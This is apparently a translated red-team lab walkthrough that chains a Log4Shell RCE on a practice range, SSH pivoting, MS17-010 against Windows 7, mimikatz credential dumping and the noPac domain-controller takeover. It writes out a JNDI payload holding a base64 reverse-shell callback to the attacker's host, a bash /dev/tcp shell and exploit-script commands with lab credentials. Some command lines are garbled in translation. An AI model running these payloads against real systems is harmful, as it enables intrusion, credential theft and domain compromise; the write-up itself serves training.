Title: From external network log4j2 RCE to internal network combination fist loophole CVE-2021-42287, CVE-2021-42278 Get DC

Network Topology

Information Collection

The first step in penetration testing is of course information collection

Get IP192.168.81.151, we first use nmap to scan the regular TCP port.

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151

Found that the two ports 22,38080 are open

Through nmap, we can know that this is an Ubuntu, 22 is ssh, and the port 38080 is unknown. Let's try to access it.

So I tried the latest new vulnerability CVE-2021-44228 to see if I can get dnslog

Found a CVE-2021-44228 vulnerability, try to get a shell

CVE-2021-44228 Utilization

First enable an LDAP in our VPS kali(192.168.81.133):

git clone https://github.com/black9/Log4shell_JNDIExploit.git

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133

Then listen on 9999 port on kali:

We use TOMCATBYpass for rebound shell

/bin/bash -i /dev/tcp/192.168.210.23/9999 01 -Bounce shell

The rebound shell command requires base64 encoding

BP packet capture, change to post parameter transmission and construct payload

payload=${jndi:ldap://192.168.81.13:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=}

Finally, using EXP to successfully rebound the shell. You must perform url encoding twice for base64 encoding to execute

I found that the shell I got is a docker container

I failed to find a way to escape, and finally found the flag file in the /root/directory:

flag{redteam.lab-1}Congratulations, you got this: saul Saul123

I got a flag, and something similar to the account password

During information collection, nmap scans to the target host to open 22ssh service, so think about the account password that may be ssh

Intranet information collection

Log in to Ubuntu system through the account and password obtained in the previous section

We can see that the current machine has two network cards, one ens33 is used to link the external network, and the other ens38 is used to communicate intranet

In actual intranet penetration: if the intranet penetration is in the Linux environment, try to form all bash and pythonization, because Linux is completely built, while intranet penetration under Windows try to form all powershell, bat and vbs. Try not to rely too much on external tools.

So we use the for loop to ping the C-segment network of Ens38

for i in 10.0.1.{1.254}; do if ping -c 3 -w 3 $i /dev/null; then echo $i Find the target; fi; done

I found that there is another machine 10.0.1.7 on the intranet

Or use scan info tool to collect intranet information

Quickly build httpd using python in Kali

Target machine download tool and grant permissions

Collect intranet information

10.0.1.7 was found to survive and existed with MS17-010

Then for convenience, I chose to use frp to proxy the traffic of the current machine:

Configure frps.ini

Configure frpc.ini

Then use Metasploit to set up Socks5 to collect in-depth information on the intranet;

setg Proxies socks5:192.168.81.13:8888setg ReverseAllowProxy true

Use the smb version detection module to scan the target:

use auxiliary/scanner/smb/smb_version

It was found that the target version 10.0.1.7 is Windows 7 and the domain REDTEAM exists.

Since it is Windows 7, there may be a MS17-010 vulnerability

MS17-010 Utilization

Through the previous section, we know that 10.0.1.7 is win7, and then we will conduct the detection.

Through detection, we found out that there is an ms17-010 vulnerability on this machine.

Since the target is that the intranet does not necessarily leave the network, the tcp reflective connection cannot be used. Set to payload forward bind_tcp

Get win7 permissions directly, then load mimikataz to grab the password

Username Domain Password root REDTEAM Red12345meterpreter load mimikatz loading tool

meterpreter creds_all lists creds

Note that the command is to grab the password from memory, the original state of the shooting range is paused and restored. If you restart, you need to log in to win7 once.

At this time, I got the account of a domain user.

Intranet weapon CVE-2021-42287, CVE-2021-42278

After collecting information on the current intranet, it was found that win7 also has an intranet network card.

And the IP address to domain control to domain control is 10.0.0.12

Since two domain vulnerabilities have recently been exposed: CVE-2021-42287 and CVE-2021-42278, try to exploit them directly.

The specific principle is: if there is a domain control name DC in the domain (the machine user corresponding to the domain control is DC), the attacker uses vulnerability CVE-2021-42287 to create a machine user saulGoodman, and then changes the sAMAccountName of the machine user saulGoodman to DC. Then use DC to apply for a TGT bill. Then change the DC sAMAccountName to sAMAccountName. At this time, KDC will determine that there is no DC and this user in the domain, and will automatically search for DC (DC is the sAMAccountName of the domain controlled DC already in the domain). The attacker uses the TGT he just applied for to S4U2self, simulates the domain manager in the domain to request the ST ticket of the domain controlled DC, and finally obtains the permissions of the domain controller DC.

So use MSF to add a socks5

Add a route

run autoroute -s 10.0.0.7/24

Then we just add the local proxy

Download the address using the tool

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

https://github.com/waterrr/noPac

Then use the script

proxychains python3 sam_the_admin.py 'redteam.lab/root:Red12345' -dc-ip 10.0.0.12 -shell proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldapproxychains python3 exp.py 'redteam/root:Red12345' -dc-ip 10.0.0.12 -shell

Finally, I got the final flag.

Target machine environment: Link : https://pan.baidu.com/s/18pXdC2f_zDsXONpSUg1fYg Extraction code : 8dcy Original link: http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/